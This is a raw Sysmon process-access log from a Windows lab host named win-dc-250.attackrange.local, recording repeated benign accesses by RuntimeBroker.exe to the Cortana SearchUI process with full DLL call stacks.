13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1382d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9 10341000x800000000000000012109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11620|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 